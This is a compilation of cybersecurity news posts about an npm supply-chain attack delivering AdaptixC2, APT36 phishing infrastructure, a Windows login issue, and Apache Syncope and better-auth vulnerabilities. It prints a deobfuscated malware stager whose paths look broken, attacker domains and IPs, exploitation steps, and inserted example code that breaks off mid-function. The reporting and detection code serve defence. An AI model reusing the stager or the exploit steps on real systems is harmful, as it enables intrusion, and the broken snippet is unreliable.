• The emergence of the AdaptixC2 post-exploitation framework in 2025 marked a significant milestone in the evolution of attacker toolsets targeting open-source supply chains.

    Positioning itself as a formidable alternative to established tools like Cobalt Strike, AdaptixC2 quickly attracted threat actors seeking agility and stealth in post-exploitation scenarios.

    This October, researchers uncovered its delivery through the npm package registry—a supply chain attack targeting developers and organizations reliant on Node.js modules for critical infrastructure and application development.

    The incident revolved around a deceptive npm package named https-proxy-utils, which mimicked the functionality and naming conventions of widely used legitimate libraries such as http-proxy-agent.

    The threat actors cloned proxy-related features from popular modules, ensuring the malicious package appeared both useful and harmless.

    Upon installation, however, the package executed a post-install script designed to download and deploy the AdaptixC2 agent onto the victim’s system, initiating a stealthy foothold for remote access and broader exploitation.

    Securelist researchers were the first to identify and analyze the AdaptixC2 npm infection, noting both the technical sophistication of the attack and its alarming implications for open-source threat landscapes.

    As the npm ecosystem grows, attackers are increasingly exploiting its trust and wide reach. The discovery highlights the persistent risk posed by supply chain attacks, emphasizing the need for vigilant vetting and continuous monitoring of open-source components.

    Infection Mechanism: OS-Specific Adaptation

    A standout feature of the AdaptixC2 npm campaign is its tailored infection strategy for multiple operating systems. Once the malicious package executes, it detects the host OS and deploys the payload using methods designed for Windows, macOS, or Linux.

    For Windows, the code sideloads the agent as a DLL alongside a legitimate executable, using JavaScript scripting to spawn the compromised process.

    Metadata for the malicious (left) and legitimate (right) packages (Source – Securelist)

    Below is a deobfuscated snippet employed for Windows deployment:

    async function onWindows() {
      const url = 'https://cloudcenter.topsysupdate';
      const dllPath = 'C:\\.dll';
      const systemMsdtc = 'C:\\32.exe';
      const tasksMsdtc = 'C:\\.exe';
      try {
        await downloadFile(url, dllPath);
        fs.copyFileSync(systemMsdtc, tasksMsdtc);
        const child = spawn(tasksMsdtc, [], { detached: true, stdio: 'ignore' });
        child.unref();
      } catch (err) {
        console.error(err);
      }
    }

    This flexible approach extends across macOS and Linux systems, employing autorun configuration and architecture-specific binary delivery to ensure persistent control.

    Such OS-targeted infection routines deepen the framework’s ability to evade conventional detection, broadening its scope for exploitation across diverse environments.
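A defender-side check for the install-script pattern described above, added here as an example and not code from the Securelist analysis or from the package: it reads a parsed package.json plus the script files its lifecycle hooks reference and flags hooks that download, write and spawn a detached process. The package, the script text, and the names `auditPackage`, `INDICATORS` and `referencedScriptFile` are all constructed for this example.

```javascript
// Added example (not code from the Securelist analysis or from the package):
// audit an npm package's lifecycle scripts for the "download, then spawn a
// detached process" stager pattern described above. Inputs are the parsed
// package.json and a map of script path -> source text, both constructed here.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Each indicator pairs a regex with the reason it contributes to the report.
const INDICATORS = [
  { re: /\bchild_process\b|\b(?:spawn|exec|execFile|execSync)\s*\(/, why: 'spawns a process' },
  { re: /detached\s*:\s*true/, why: 'detaches the child (survives the install)' },
  { re: /\bhttps?:\/\/[^\s'"]+/, why: 'contains a hard-coded URL' },
  { re: /\b(?:https?\.get|fetch|downloadFile|request)\s*\(/, why: 'performs a network download' },
  { re: /process\.platform|os\.platform\(\)/, why: 'branches on the host OS' },
  { re: /\.(?:dll|exe)\b/i, why: 'references a Windows binary' },
  { re: /copyFileSync|writeFileSync|chmodSync/, why: 'writes files to disk' },
];

// Extract the script file from a hook command such as "node lib/setup.js".
function referencedScriptFile(command) {
  const m = /\bnode\s+(?:\.\/)?([\w./-]+\.[cm]?js)\b/.exec(command);
  return m ? m[1] : null;
}

// Returns { name, level, findings }; level is 'none' (no lifecycle hooks),
// 'low' (hooks but no indicators), 'medium' (some indicators) or 'high'
// (download and spawn together, the stager pattern).
function auditPackage(pkg, files) {
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const command = pkg.scripts && pkg.scripts[hook];
    if (!command) continue;
    const file = referencedScriptFile(command);
    // Scan the referenced file when we have it, otherwise the command itself.
    const source = file && files[file] !== undefined ? files[file] : command;
    const reasons = INDICATORS.filter(i => i.re.test(source)).map(i => i.why);
    findings.push({ hook, command, file, reasons });
  }
  const all = new Set(findings.flatMap(f => f.reasons));
  const downloads = all.has('performs a network download') || all.has('contains a hard-coded URL');
  const spawns = all.has('spawns a process');
  let level = 'none';
  if (findings.length > 0) level = downloads && spawns ? 'high' : all.size > 0 ? 'medium' : 'low';
  return { name: pkg.name, level, findings };
}

// Constructed sample modelled on the pattern quoted in the article; the
// URL and file names are placeholders, not the real campaign's values.
const SAMPLE_PKG = { name: 'example-proxy-utils', version: '1.0.0', scripts: { postinstall: 'node lib/setup.js' } };
const SAMPLE_FILES = {
  'lib/setup.js': [
    "const fs = require('fs');",
    "const { spawn } = require('child_process');",
    'async function onWindows() {',
    "  await downloadFile('https://example.invalid/agent', 'agent.dll');",
    "  fs.copyFileSync('host.exe', 'host-copy.exe');",
    "  spawn('host-copy.exe', [], { detached: true, stdio: 'ignore' }).unref();",
    '}',
    "if (process.platform === 'win32') onWindows();",
  ].join('\n'),
};
const BENIGN_PKG = { name: 'benign-lib', version: '2.0.0', scripts: { test: 'node test.js' } };

console.log(JSON.stringify(auditPackage(SAMPLE_PKG, SAMPLE_FILES), null, 2));
```

Setting `ignore-scripts=true` in .npmrc stops lifecycle scripts from running at install time, which is the step this campaign relies on; packages that genuinely need a build step can then be allowed case by case.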


    The post Threat Actors Leverage npm Ecosystem to Deliver AdaptixC2 Post-Exploitation Framework appeared first on Cyber Security News.


  • A sophisticated phishing campaign orchestrated by Pakistan-linked threat actors has been discovered targeting Indian government entities by impersonating the National Informatics Centre’s email services.

    The operation, attributed to APT36, also known as TransparentTribe, leverages social engineering tactics to compromise sensitive government infrastructure through deceptive email communications designed to appear as legitimate NIC eEmail Services correspondence.

    The campaign employs carefully crafted phishing lures that mimic official government communication channels, exploiting the trust associated with NIC’s established email infrastructure.

    By masquerading as authentic government correspondence, the threat actors aim to trick officials into divulging credentials or downloading malicious payloads.

    This targeting strategy demonstrates the group’s deep understanding of Indian government communication protocols and their continued focus on intelligence gathering operations against Indian administrative and defense sectors.

    Cyber Team analysts identified the malicious infrastructure supporting this campaign, uncovering a network of fraudulent domains and command-and-control servers designed to facilitate credential harvesting and data exfiltration.

    The operation represents a continuation of APT36’s long-standing espionage activities against Indian government targets, reflecting the group’s persistent interest in compromising sensitive governmental communications.

    Infrastructure and Technical Indicators

    The attack infrastructure reveals a multi-layered command-and-control framework centered around the fraudulent domain accounts.mgovcloud[.]in.departmentofdefence[.]live, which closely mimics legitimate government cloud services.

    The primary malicious domain departmentofdefence[.]live serves as the foundation for the phishing operation, while IP address 81.180.93[.]5 operates as a stealth server with C2 functionality accessible on port 8080.

    Additional infrastructure includes IP 45.141.59[.]168, providing redundancy and resilience to the adversary’s command-and-control network.

    This sophisticated setup enables the threat actors to maintain persistent access while evading detection through a distributed infrastructure that complicates attribution and takedown efforts.


    The post Pakistani Threat Actors Targeting Indian Govt. With Email Mimic as ‘NIC eEmail Services’ appeared first on Cyber Security News.


  • Cybersecurity is not just about defense; it is about protecting profits. Organizations without modern threat intelligence (TI) face escalating breach costs, wasted resources, and operational inefficiencies that hit the bottom line.

    Actionable intel can help businesses cut costs, optimize workflows, and neutralize risks before they escalate.

    Security operations centers (SOCs) suffer from inefficiency and burnout without high-fidelity TI. Analysts manually sift through thousands of alerts, many of which are false positives, wasting time and budgets while overlooking real threats.

    This reactive chaos leads to high turnover, with false positives costing enterprises up to $1.3 million annually in labor alone, and burnout making staff twice as likely to seek new jobs.

    Undetected threats turn into financial disasters, exploiting visibility gaps and slow responses. Generic TI feeds often miss evasive attacks, allowing breaches to cause downtime, fines, and lost trust.

    The global average breach cost in 2025 is $4.44 million, with U.S. organizations facing $10.22 million, while nearly one in five small and medium-sized businesses (SMBs) could close after a successful attack.

    Compliance gaps invite fines and legal risks, as regulators demand proactive threat documentation. Without real-time TI, audits reveal shortcomings, triggering penalties like GDPR’s up to 4% of global revenue or €20 million, and HIPAA violations exceeding $1.5 million per incident.

    Five Strategies for Cost Savings with Threat Intelligence

    TI prevents breaches early through feeds providing real-time data on indicators of compromise (IOCs). ANY.RUN’s Threat Intelligence Feeds deliver actionable intel from over 15,000 SOC investigations, blocking threats at the source and avoiding multimillion-dollar recoveries.

    Preventing Breaches Proactively

    Threat intelligence (TI) stops breaches early by delivering real-time IOC feeds that integrate with firewalls and EDR tools for automated blocking of threats like malicious domains.

    Platforms such as ANY.RUN provide 24 times more IOCs from global SOC data, enabling quick risk isolation and reducing breach likelihood by up to 70% through predictive attacker insights.

    Eliminating False Positive Waste

    TI filters alerts by enriching them with context on threat actors and TTPs, cutting investigation time on benign events and alleviating alert fatigue that wastes 30% of analyst hours.

    ANY.RUN’s TI Lookup prioritizes high-risk threats via SIEM integrations, saving up to 50% in labor by focusing teams on verified dangers rather than noise.

    Cutting Labor Costs Through Automated Triage

    Automated TI triage uses APIs to connect with SOAR and EDR, providing instant sandbox context to reduce manual escalations and empower junior analysts.

    ANY.RUN’s SDK automates artifact enrichment, minimizing turnover and overtime while boosting SOC capacity by 20-30% without additional hires.

    Accelerating Response to Limit Damage

    TI speeds incident response with full attack visibility from single IOCs, shortening MTTR by 40-60% through sandbox reports on malware behaviors.

    ANY.RUN’s feeds link to detailed analyses, enabling precise containment that cuts downtime costs—up to $100,000 per hour—and prevents revenue loss from prolonged incidents.

    Maintaining Up-to-Date Defenses Effortlessly

    Continuous TI updates deliver real-time, 99% unique IOCs with MITRE ATT&CK mappings, automating adaptations to evolving threats like ransomware without manual effort.

    ANY.RUN’s query notifications keep defenses proactive, reducing breach risks by 50% and avoiding costs from outdated static feeds.

    TI eliminates false positive waste by filtering alerts for verified threats. ANY.RUN’s solutions cut noise, saving hours on triage and redirecting budgets to high-impact tasks, reducing alert fatigue that plagues teams.

    Automated triage lowers labor costs via seamless integrations. ANY.RUN’s API and SDK connect with SIEM, SOAR, and EDR tools, enriching alerts instantly and minimizing escalations, thus avoiding overtime and hiring needs.

    Faster responses minimize fallout, with TI providing full attack context from sandbox analyses. ANY.RUN’s TI Lookup offers instant IOC enrichment, shortening mean time to respond (MTTR) and limiting downtime losses.

    Continuous updates future-proof defenses without manual effort. ANY.RUN’s feeds refresh in real time with 99% unique IOCs, integrating MITRE ATT&CK mappings to adapt to evolving threats proactively.

    An international transport firm battled phishing and malware by adopting ANY.RUN’s TI Lookup for automated tracking of geo-targeted threats and CVEs.

    Custom queries and real-time updates enabled quick rule creation, slashing manual research and boosting detection speed. The result: blocked attacks preemptively, optimized resources, and enhanced proactive defenses against shifting attacker tactics.

    Threat intelligence like ANY.RUN’s TI Feeds and Lookup transforms security from a cost center into a profit protector.


    The post How Threat Intelligence Can Save Money and Resources for Businesses appeared first on Cyber Security News.


  • Microsoft has acknowledged a significant authentication problem affecting users of recent Windows versions, stemming from security enhancements in updates released since late August 2025.

    The company detailed how these updates are triggering Kerberos and NTLM failures on devices sharing identical Security Identifiers (SIDs), leading to widespread login disruptions across enterprise networks.

    This issue, now officially documented, highlights the trade-offs between bolstering security and maintaining compatibility in cloned or duplicated systems.

    Windows Operating Systems Affected

    Affected users on Windows 11 version 24H2, version 25H2, and Windows Server 2025 report a range of frustrating symptoms following the installation of updates like KB5064081 on August 29, 2025, and KB5065426 on September 9, 2025.

    Common issues include repeated credential prompts despite entering valid information, with error messages such as “Login attempt failed,” “Your credentials didn’t work,” or “There is a partial mismatch in the machine ID.”

    Network access breaks down as well, preventing connections to shared folders via IP or hostname and blocking Remote Desktop Protocol (RDP) sessions, even those routed through Privileged Access Management (PAM) tools or third-party software.

    Failover Clustering operations halt with “access denied” errors, complicating high-availability setups in data centers. Event Viewer logs reveal critical clues, including SEC_E_NO_CREDENTIALS in the Security log and Local Security Authority Server Service (lsasrv.dll) Event ID 6167 in the System log, signaling a machine ID mismatch that suggests ticket manipulation or session discrepancies.

    These problems have surfaced prominently in virtual desktop infrastructure (VDI) environments, such as those using Citrix MCS, where multiple machines derived from the same image share SIDs, exacerbating authentication breakdowns during RDP or file sharing.

    At the heart of this disruption lies a deliberate security upgrade in the updates, which now rigorously verifies SIDs during authentication handshakes to prevent unauthorized access.

    Microsoft explains that duplicate SIDs, often resulting from improper cloning of Windows installations without the Sysprep tool, are no longer tolerated under this new regime.

    Sysprep ensures SID uniqueness, a requirement Microsoft has long recommended for duplicating OS images, but the August updates enforce it more stringently, blocking interactions between affected devices.

    This change aligns with Microsoft’s policy against unsupported disk duplication methods, which can propagate identical SIDs across networks, posing risks in enterprise settings.

    While intended to enhance protection against potential exploits, the enforcement has caught many IT teams off guard, particularly in scenarios involving rapid VM deployments or legacy imaging practices.

    For immediate relief, IT administrators can deploy a specialized Group Policy to mitigate the authentication blocks, though this requires contacting Microsoft Support for business to obtain it.

    However, Microsoft suggests that the definitive solution involves rebuilding impacted devices using approved cloning procedures that incorporate Sysprep, ensuring each system generates a unique SID.

    Organizations relying on tools like VMware or Citrix for VDI provisioning may need to revise their workflows to comply, potentially delaying updates until imaging processes are updated.

    As of October 21, 2025, no broader patch has been rolled out, but Microsoft continues monitoring reports from affected users.
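An added example, not Microsoft's guidance or tooling, of how to locate the duplicate machine SIDs behind these failures before rebuilding: it derives each host's machine SID from an exported local-account SID, groups hosts that share one, and marks which of them have already logged the lsasrv Event ID 6167 named above. The inventory, the event records and the function names `machineSidOf` and `findDuplicateMachineSids` are constructed for this example.

```javascript
// Added example (not Microsoft's tooling): find hosts that share a machine SID
// from an inventory of local-account SIDs, and cross-reference the hosts that
// logged the lsasrv Event ID 6167 described in the article. The inventory and
// event records are constructed; on a real fleet they would come from each
// host's local account listing and its System event log export.

// A local account SID is the machine SID (S-1-5-21-A-B-C) plus a trailing RID,
// so stripping the last component recovers the machine SID. Use local accounts
// (e.g. the built-in Administrator, RID 500): domain account SIDs carry the
// domain's SID, not the machine's.
function machineSidOf(accountSid) {
  const m = /^(S-1-5-21-\d+-\d+-\d+)-\d+$/.exec(accountSid);
  if (!m) throw new Error('not a local account SID: ' + accountSid);
  return m[1];
}

// inventory: [{ host, accountSid }]   events: [{ host, source, eventId }]
// Returns one entry per machine SID shared by two or more hosts.
function findDuplicateMachineSids(inventory, events) {
  const hostsBySid = new Map();
  for (const { host, accountSid } of inventory) {
    const sid = machineSidOf(accountSid);
    if (!hostsBySid.has(sid)) hostsBySid.set(sid, new Set());
    hostsBySid.get(sid).add(host);
  }
  // Hosts whose System log already carries the machine-ID mismatch event.
  const hostsWith6167 = new Set(
    events.filter(e => e.eventId === 6167 && /lsasrv/i.test(e.source)).map(e => e.host),
  );
  const duplicates = [];
  for (const [sid, hosts] of hostsBySid) {
    if (hosts.size < 2) continue;
    duplicates.push({
      machineSid: sid,
      hosts: [...hosts].sort(),
      reporting6167: [...hosts].filter(h => hostsWith6167.has(h)).sort(),
    });
  }
  return duplicates.sort((a, b) => a.machineSid.localeCompare(b.machineSid));
}

// Constructed inventory: VDI-01/02/03 were cloned from one image without
// Sysprep and so share a machine SID; FS-01 was built with a unique one.
const INVENTORY = [
  { host: 'VDI-01', accountSid: 'S-1-5-21-1111111111-2222222222-3333333333-500' },
  { host: 'VDI-02', accountSid: 'S-1-5-21-1111111111-2222222222-3333333333-500' },
  { host: 'VDI-03', accountSid: 'S-1-5-21-1111111111-2222222222-3333333333-1001' },
  { host: 'FS-01', accountSid: 'S-1-5-21-4444444444-5555555555-6666666666-500' },
];
// Constructed System-log entries; only the 6167 from LsaSrv is relevant here.
const EVENTS = [
  { host: 'VDI-02', source: 'LsaSrv', eventId: 6167 },
  { host: 'FS-01', source: 'LsaSrv', eventId: 6038 },
];

console.log(JSON.stringify(findDuplicateMachineSids(INVENTORY, EVENTS), null, 2));
```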


    The post Microsoft Confirms Recent Updates Cause Login Issues on Windows 11 24H2, 25H2, and Windows Server 2025 appeared first on Cyber Security News.


  • Meta announced innovative tools on Tuesday to shield users of Messenger and WhatsApp from scammers. The updates, revealed during Cybersecurity Awareness Month, aim to detect suspicious activity in real-time and empower users with better account protections.

    This comes as scammers increasingly target vulnerable groups, including older adults, through messaging apps and social platforms.

    Since the start of 2025, Meta’s teams have disrupted nearly 8 million accounts linked to global scam centers operating from regions like Myanmar, Laos, Cambodia, the UAE, and the Philippines.

    These networks exploit dating apps, social media, and crypto channels to deceive victims. The FBI’s 2024 Internet Crime Report highlighted the scale of the problem, noting that Americans over 60 lost $4.8 billion to fraud last year alone. Criminals often build trust to compromise accounts, then prey on contacts for further scams.

    Enhanced detection features are key to Meta’s response. On WhatsApp, a new warning now alerts users when sharing their screen during video calls with unknown contacts, a common tactic scammers use to extract sensitive details like bank information or verification codes.

    For Messenger, advanced AI-driven scam detection is in testing: it flags potentially fraudulent messages from new contacts, offers to review chats, and provides tips on blocking or reporting. Users receive details on common schemes and recommended actions if a scam is identified.

    Meta is also promoting passkeys across Facebook, Messenger, and WhatsApp for seamless, biometric logins using fingerprints, faces, or PINs, reducing reliance on vulnerable passwords.

    Security Checkup on Facebook and Instagram reviews settings and suggests updates, while WhatsApp’s Privacy Checkup helps users manage group invites and other privacy options.

    Beyond tools, Meta shared scam trends uncovered with Graphika researchers. Watch for fake home remodeling or debt relief sites luring seniors with phony government benefits via ads on Facebook and Google.

    Fraudulent “money recovery” services mimic the FBI’s IC3 site, while impostor customer support pages hijack brand comments to push refunds through DMs or forms.

    To stay safe, Meta advises caution with unsolicited messages, never sharing personal or financial data, and verifying issues through official channels.

    Families can assist by discussing red flags like urgency or secrecy, and resources from AARP’s Fraud Watch Network or the FTC offer reporting options.

    Meta is deepening collaborations, joining the National Elder Fraud Coordination Center alongside AARP, Amazon, Google, and others to tackle elder fraud through shared intelligence and investigations.

    As part of the Tech Against Scams Coalition, it recently dismantled scam-linked Facebook Groups with Match Group. Globally, initiatives include training Thai seniors on digital literacy and awareness campaigns in Europe and India featuring local creators.

    These efforts underscore Meta’s commitment to evolving defenses against cross-border threats, with ongoing updates to keep users ahead of scammers.


    The post Meta Launches New Tools to Protect Messenger and WhatsApp Users from Scammers appeared first on Cyber Security News.


  • A swarm of Russian drones shut down the electric grid in parts of Ukraine Tuesday, leaving hundreds of thousands without power—a sign of more blackouts to come this winter. Russia has mounted attacks on civilian infrastructure since it first invaded Ukraine in 2022, and such strikes are expected to grow more frequent as temperatures drop in coming weeks and months. 

    What’s new: “Analysts and officials say that this year Moscow has shifted tactics, targeting specific regions and gas infrastructure,” AP reports.

    European leaders back White House stance on Ukraine. Leaders from across Europe, including the European Union, Britain, France, Germany, and Ukraine, penned a joint statement Tuesday, calling for a ceasefire and more pressure on Russia’s economy. “We are all united in our desire for a just and lasting peace, deserved by the people of Ukraine. We strongly support President Trump’s position that the fighting should stop immediately, and that the current line of contact should be the starting point of negotiations,” leaders wrote in the statement issued by the British government. “We must ramp up the pressure on Russia’s economy and its defence industry, until Putin is ready to make peace.” Read the statement, here.

    Asia-Pacific

    AUKUS is back on after a monthslong review by the Pentagon sparked uncertainty. President Donald Trump, who earlier this year appeared not to know about the trilateral deal, assuaged concerns about the submarine deal’s future, saying U.S. production was “full steam ahead” during a meeting with Australian Prime Minister Anthony Albanese on Monday. “They’re building magnificent holding pads for the submarines. It’s going to be expensive. You wouldn’t believe the level of complexity and how expensive it is,” Trump said. Australia has committed billions of dollars for the deal and its alliance is considered critical for stability in the Indo-Pacific region. 

    Minerals deal. The White House and Australia also signed a critical minerals deal, agreeing to put up $1 billion together in the next six months, according to a White House summary of the deal. Albanese said Australia has $8.5 billion in the pipeline for the arrangement and about $50 billion in resources are estimated to be recovered, NBC reported.

    The rare-earth minerals deal comes ahead of a fraught White House meeting with Chinese President Xi Jinping next week. On Oct. 9, China “announced sweeping new rare earth export controls on Thursday, tightening global access to critical raw materials required for computer chips and defense technology,” as the Washington Post put it. One day later, Trump responded with a threat to levy new 100-percent tariffs on Chinese goods, starting Nov. 1 “or earlier.” 

    Trump also threatened to cancel his meeting with Xi, which could be strained further by Taiwan discussions. But the president insisted to reporters that China wasn’t interested in invading Taiwan, but noted the topic would likely come up, Reuters reported. “China doesn't want to do that,” Trump said, per Politico. “We have the best of everything and nobody is going to mess with that…I think we'll end up with a very strong trade deal. Both of us will be happy.”

    Beijing: Hey, the US is spying on us. China accused the National Security Agency of hacking its sensitive systems that keep standard time for defense, finance, and telecommunications sectors. Read more, here.

    Welcome to this Tuesday edition of The D Brief, a newsletter dedicated to developments affecting the future of U.S. national security, brought to you by Bradley Peniston and Lauren C. Williams. It’s more important than ever to stay informed, so thank you for reading. Share your tips and feedback here. And if you’re not already subscribed, you can do that here. This day in 1960 saw the maiden flight of the W2F-1, the prototype for the E-2 Hawkeye carrier-based airborne early warning aircraft still in service today.

    AI in Europe

    Two European nations embrace AI governance to keep safe. The governments of Estonia and Ukraine are racing ahead to harness artificial intelligence, which they believe is crucial to building societies that can fend off Russian assaults—whether by missiles or denial-of-service attacks, Defense One’s Patrick Tucker reports.

    “Estonia knows what it means to live on the digital frontline. AI gives us an advantage that size alone cannot. This is why we have an AI strategy for defense and a Force Transformation Command within the Estonian Defense Forces. With industry, startups, and the military working side by side, we move from idea to field faster,” Estonian Prime Minister Kristen Michal told an audience of international technology executives and government officials. “Russia’s war has made one thing clear: the side that can integrate technology faster has the advantage. Ukraine has shown it. So, while supporting them in every way, we also learn from them.” This means more than buying AI tools and services, he said: it means completely rethinking governmental structure and function. More details, here.

    Around the US

    NNSA furloughs most of its staff. The Trump administration furloughed 1,400 employees of the National Nuclear Security Administration on Monday as payroll funds ran out and the shutdown entered its third week. “About 400 NNSA employees will continue working without pay to secure the nuclear stockpile and maintain minimum safety conditions,” Federal News Network reported Monday. Energy Secretary Chris Wright: “This has never happened before.” Politico has background, here.

    Border relocation. House Democrats want to know why Homeland Security moved key cyber workers to the border. The Monday letter — led by Rep. James Walkinshaw, D-Va., and also signed by Reps. Suhas Subramanyam, D-Va., Eugene Vindman, D-Va., and Shontel Brown, D-Ohio, along with Del. Eleanor Holmes Norton, D-D.C. — argues that DHS violated the Antideficiency Act when it conducted a reduction in force during the government shutdown. The agency has also moved to reassign Cybersecurity and Infrastructure Security Agency staff to roles within Immigration and Customs Enforcement, the Federal Protective Service and Customs and Border Protection. Get the full story here.

    ICYMI: Many communications satellites don’t encrypt their traffic, study finds. Wired: “With just $800 in basic equipment, researchers found a stunning variety of data—including thousands of T-Mobile users’ calls and texts and even US military communications—sent by satellites unencrypted.” Read on, here.


  • The Cybersecurity and Infrastructure Security Agency (CISA) has issued a high-priority alert about a critical vulnerability in multiple Apple products.

    Tracked as CVE-2022-48503, this unspecified issue in the JavaScriptCore engine could allow attackers to execute arbitrary code simply by processing malicious web content. The flaw affects macOS, iOS, tvOS, Safari, and watchOS, putting millions of users at risk of remote exploitation.

    First disclosed in 2022, the vulnerability has resurfaced in active attacks, according to CISA’s Known Exploited Vulnerabilities (KEV) catalog. Security researchers note that while Apple patched it in subsequent updates, unpatched or end-of-life (EoL) systems remain prime targets.

    “This isn’t just a relic of the past; threat actors are weaponizing old bugs against outdated devices,” said a CISA spokesperson in the advisory.

    The agency emphasized that the vulnerability’s severity stems from its potential for full system compromise, enabling data theft, ransomware deployment, or further malware spread.

    Although no direct ties to ransomware campaigns have been confirmed, the unknown exploitation history underscores the urgency for immediate action.

    Widespread Impact on Apple’s Ecosystem

    The vulnerability’s broad reach spans Apple’s core operating systems and browser. JavaScriptCore, the engine powering Safari and other web rendering in iOS, macOS, tvOS, and watchOS, processes dynamic web elements like scripts and animations.

    An attacker could craft a booby-trapped webpage or email link to trigger the flaw, bypassing traditional defenses. Older devices, such as those running iOS 15 or earlier macOS versions, are particularly vulnerable if they haven’t received updates.

    CISA warns that end-of-service (EoS) products no longer supported by Apple offer no patch path, leaving users exposed indefinitely.

    For cloud-integrated services, CISA references Binding Operational Directive (BOD) 22-01, urging federal agencies and critical infrastructure operators to apply mitigations or retire affected systems.

    Private users face similar risks, especially in hybrid work environments where personal Apple devices handle sensitive data.

    CISA’s directive is clear: Update to the latest vendor-patched versions immediately. Apple released fixes in security updates dating back to early 2023, but users must verify their systems via Settings > General > Software Update.

    If mitigations aren’t feasible, particularly for EoL hardware, the agency advises discontinuing use to avoid exploitation. Network defenders should monitor for anomalous JavaScript activity and enforce endpoint detection rules targeting code execution attempts.

    Recent reports indicate that attacks on Apple platforms are surging by 20% year over year, making staying vigilant non-negotiable. Organizations delaying patches risk cascading breaches, while individuals should prioritize updates to safeguard their digital lives.


    The post CISA Warns of Apple macOS, iOS, tvOS, Safari, and watchOS Vulnerability Exploited in Attacks appeared first on Cyber Security News.


  • Meta on Tuesday said it’s launching new tools to protect Messenger and WhatsApp users from potential scams. To that end, the company said it’s introducing new warnings on WhatsApp when users attempt to share their screen with an unknown contact during a video call so as to prevent them from giving away sensitive information like bank details or verification codes. On Messenger, users can opt to


  • Apache Syncope, an open-source identity management system, has been found vulnerable to remote code execution (RCE) through its Groovy scripting feature, as detailed in CVE-2025-57738.

    This flaw affects versions prior to 3.0.14 and 4.0.2, where administrators can upload malicious Groovy code that runs with the full privileges of the Syncope Core process.

    Discovered by security researcher Mike Cole of Mantel Group, the vulnerability stems from the lack of a sandbox environment for Groovy implementations, potentially allowing attackers to compromise entire systems.

    The issue arises because Syncope lets users extend its core functionality via custom Java interfaces, which can be implemented using either Java classes or Groovy scripts for hot-reloading at runtime.

    In vulnerable versions, the GroovyClassLoader compiles and executes these scripts without restrictions, exposing dangerous APIs like Runtime.exec or ProcessBuilder to untrusted input.

    This design choice enables delegated administrators with access to the Implementations and Reports APIs to inject code that performs arbitrary operations on the server.

    Apache Syncope Groovy RCE Vulnerability

    Syncope’s architecture includes an “Implementation” abstraction for custom logic, with Groovy as one supported engine type.

    Without a security manager or deny-list, uploaded Groovy code can directly invoke system-level functions, such as filesystem access or process spawning.

    For instance, attackers can create a Groovy implementation of type REPORT_DELEGATE, bind it to a report, and trigger execution via REST endpoints like POST /syncope/rest/reports/{key}/execute.

    This executes the code under the Syncope service account, which often runs with elevated privileges in enterprise deployments.

    Reproduction involves simple HTTP requests using basic authentication, such as uploading a script that touches a marker file in /tmp to prove execution.

    The vulnerability requires administrative entitlements but does not need pre-authentication, making it a high-risk insider or compromised account threat.

    Execution surfaces include reports, tasks, and connectors, broadening the application’s attack paths. If hardening is weak, attackers could inspect environment variables for secrets, write files, or pivot to container hosts.

    Mapped to MITRE ATT&CK, this aligns with tactics like Valid Accounts (T1078) and Command and Scripting Interpreter (T1059), enabling persistence and evasion.

    Apache has addressed the issue in releases 3.0.14 and 4.0.2 by introducing a Groovy sandbox that blocks hazardous operations through classloading restrictions and policy enforcement.

    Users should upgrade immediately, as binary patches are not provided, and rebuild from source if needed. To verify the fix, attempt the same exploitation steps; sandbox violations should now log errors without executing code.

    Disable Groovy engines and favor vetted Java implementations via CI/CD pipelines for interim protection on vulnerable versions.


    The post Apache Syncope Groovy RCE Vulnerability Let Attackers Inject Malicious Code appeared first on Cyber Security News.


  • A severe vulnerability in the popular better-auth library’s API keys plugin enables attackers to generate privileged credentials for any user without authentication.

    Tracked as CVE-2025-61928, the issue affects better-auth, a TypeScript authentication framework downloaded around 300,000 times weekly on npm.

    This flaw could lead to widespread account compromises, particularly for applications relying on API keys for automated access. Better-auth powers authentication for fast-growing startups and major enterprises, including energy giant Equinor.

    Its plugin architecture simplifies adding features like API key management, but a subtle bug in the authorization logic opened the door to exploitation.

    ZeroPath uncovered the vulnerability during scans of third-party dependencies, highlighting risks in authentication libraries that underpin entire application ecosystems.

    Better Auth API Keys Vulnerability

    The problem lies in the createApiKey handler within the plugin. Normally, it derives user context from an active session to enforce security checks.

    However, when a request lacks a session but includes a userId in the body, the code sets an “authRequired” flag to false. This skips critical validations, allowing the handler to fabricate a user object from attacker-supplied data.

    As a result, unauthenticated attackers can POST to the /api/auth/api-key/create endpoint with a target user’s ID, name, and optional privileged fields like rate limits or permissions.

    The response returns a valid API key tied to the victim’s account, bypassing multi-factor authentication and enabling scripted takeovers. The same logic affects update endpoints, amplifying the risk.

    API keys often grant long-lived, elevated privileges for automation, making this vulnerability particularly dangerous. Attackers could impersonate users, access sensitive data, or automate malicious actions across services.

    Only deployments with the API keys plugin are impacted, but given better-auth’s adoption, exposure is significant. To mitigate, upgrade immediately to better-auth version 1.3.26 or later, which fixes the authorization check.

    Rotate all API keys created via the plugin, invalidate unused ones, and audit logs for suspicious unauthenticated requests to create or update endpoints, especially those setting userId or high-privilege values.

    The maintainers patched it swiftly after disclosure on October 2. The advisory (GHSA-99h5-pjcv-gr6v) was published on October 8 via GitHub, and the CVE was assigned the next day.
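A simplified model of the flawed authorization check described above, placed next to a hardened version, added here as illustration; it is not better-auth's own handler, and the request shape, the `issueApiKey` helper, the `fromServer` marker and the user store are assumptions of this example.

```javascript
// Added example: a simplified model of the "trust the body's userId when there is
// no session" flaw described in the advisory, beside a hardened handler. This is
// illustrative code for this page, not better-auth's implementation; the request
// shape, issueApiKey and the fromServer marker are assumed.

// Constructed user store; keys may only be issued against these records.
const USERS = new Map([
  ['user-1', { id: 'user-1', name: 'alice', role: 'admin' }],
  ['user-2', { id: 'user-2', name: 'bob', role: 'member' }],
]);

let keyCounter = 0;
function issueApiKey(user, opts) {
  keyCounter += 1;
  return {
    key: 'key_' + keyCounter,
    userId: user.id,
    permissions: opts.permissions || [],
    rateLimitMax: opts.rateLimitMax !== undefined ? opts.rateLimitMax : 100,
  };
}

// Vulnerable pattern: when no session is present but the body names a user,
// the auth requirement is switched off and a user object is fabricated from
// attacker-supplied data, so the key (and its privileges) go to any account.
function createApiKeyVulnerable(req) {
  let user = req.session ? req.session.user : null;
  let authRequired = true;
  if (!user && req.body.userId) {
    authRequired = false; // the bug: body-supplied identity replaces a session
    user = { id: req.body.userId, name: req.body.name };
  }
  if (authRequired && !user) return { status: 401, error: 'UNAUTHORIZED' };
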